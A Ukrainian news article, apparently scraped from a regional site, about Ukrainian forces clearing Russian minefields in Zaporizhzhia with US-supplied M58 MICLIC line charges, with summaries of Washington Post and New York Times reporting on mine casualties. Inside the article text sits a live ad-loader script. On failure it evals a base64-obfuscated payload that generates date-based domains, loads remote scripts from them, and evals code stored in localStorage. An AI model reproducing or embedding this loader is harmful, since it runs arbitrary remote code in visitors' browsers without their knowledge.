Як ЗСУ вночі установками M58 MICLIC розчищають мінні поля на Запоріжжі (ВІДЕО)

Однієї з найбільших перешкод для просування ЗСУ у Запорізькій області є величезна кількість мінних полів, що встигли збудувати за рік окупації росіяни.

Як інформує Акцент, Сили оборони України опублікували відео нічної роботи установки по розмінуванню M58 MICLIC, що були поставлені США.

Як зазначається, засоби розмінування M58 MICLIC використвує 15-та бригада оперативного призначення «Кара-Даг». Точна локація не називається, проте відомо, що підрозділ працює на Токмацько-Пологівському напрямку. Кожен запуск ракет з такої установки здатен розчистити ділянку від мін довжиною в 100 м і шириною у 8 м.

Довідка. M58 MICLIC — американська установка розмінування. Використовує лінійний вибуховий заряд, протяжний шнур із вибухівки довжиною 350 футів (~100 м), який запускається ракетою в напрямку замінованої ділянки, після чого вибухає. Дальність і точність роботи незначна, в угоду простоті і швидкості застосування. УР ефективний проти протипіхотних мін зі звичайним запалом і, коли підривається, забезпечує смугу 8 на 100 метрів. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Зафіксовані нові просування ЗСУ на Токмацькому напрямку (ВІДЕО, КАРТА) Втрати ЗСУ від мін перевершили втрати від артилерії, — WP

Американське видання The Washington Post опублікувало велику статтю, присвячену проблемам подоллання Силами оборониу України мінних загороджень на Південному напрямку. Зокрема, там зазначають, що в ЗСУ перейшли до нової стратегії наступу в Запорізькій області. Військові тепер просуваються пішки. Цю інформацію підтверджують і знайомі військові Акценту, що знаходяться на Запоріжжі. Просування йде набагато повільніше, піхота діє дуже обережно. Наводимо основін тези, викладені у західних ЗМІ:

Пішки штурмуватимуть позиції росіян доти, доки Сили Оборони не зможуть залучити касетні боєприпаси: вогнева перевага дозволить ЗСУ отримати час і простір для використання вже наявної інженерної техніки, пише The Washington Post.

5-16 км перед російськими позиціями всіяно мінами. Тривала підготовка ЗСУ до контрнаступу, викликана очікуванням озброєнь, дала змогу рашистам замінувати території в буферній зоні, що наразі ускладнює просування української армії та призводить довтрат — і техніки, і людей.Сапери плазом у сутінках намагаються проводити розмінування вручну. Окупанти тим часом можуть скинути нові міни з безпілотників, зводячи нанівець їхні зусилля. The New York Times: Російські мінні поля складаються з декількох видів вибухових пристроїв.міни-пастки, які детонують при спробі їх підняти; міни, начинені шрапнеллю (спрацьовують при наступі); міни-розтяжки; окрему проблему становлять пластикові міни — такі осколки в тілі солдатів складно виявити, оскільки медичні металодетектори їх не виявляють; бойові машини Bradley спокійно долають протипіхотні міни, але їх зупиняють протитанкові пристрої. Сапери працюють вночі, в групах по чотири людини. Спочатку розчищають вузьку доріжку, а потім трохи розширюють її, щоб двоє солдатів могли йти поруч із носилками. Часто працюють без металошукача, оскільки він занадто помітний. Тому сапери повзуть, сподіваючись просто виявити міни. NYT: міни перевершили артилерію як основну причину поранень. Але вони — не єдина проблема саперів. У міру просування українські солдати виходять із зони дії деяких систем ППО і стають уразливими для орківських вертольотів.WP: Київ отримав менше ніж 15% техніки для розмінування, включно із системами M58. Саме їх, а також торпедні вибухові заряди «Бангалор» постійно просили у західних партнерів міністр оборони Резніков і головнокомандувач Залужний. Водночас, наявні у ЗСУ машини з розмінування стають легкою мішенню для російських військ, бо противник очікує появи такої техніки: вона масивна, гучна, і тому — помітна. WP: Рішення США надати Україні «суперечливі» касетні боєприпаси надасть Києву вогневу перевагу, що дозволить українським військовим мати достатньо часу і простору для використання наявного інженерного обладнання.Глибина і щільність мінних полів зараз є головною проблемою вздовж південної лінії фронту в Запорізькій області: рашисти очікували, що українці підуть в атаку і спробують перерізати сухопутний коридор через окупований регіон, який з’єднує російський кордон з Кримом. «Місцевість у цьому районі – це переважно розлогі відкриті поля, де українцям не було де замаскувати свою велику техніку і транспортні засоби. За словами солдатів, росіяни обрали для своїх позицій височини», – WP.

Про оперативну ситуацію на Запорізькому фронті та просування ЗСУ читайте в нашому матеріалі: Генштаб повідомляє про успіхи ЗСУ на Мелітопольському й Бердянському напрямках (КАРТА) (adsbygoogle = window.adsbygoogle || []).push({});

Одразу мінус два: як арта ЗСУ «накрила» гаубицю та «Урал» РФ з БК на Бердянському напрямку (ВІДЕО) Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/yak-zsu-vnochi-ustanovkami-m58-miclic-rozchishhayut-minni-polya-na-zaporizhzhi-video/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top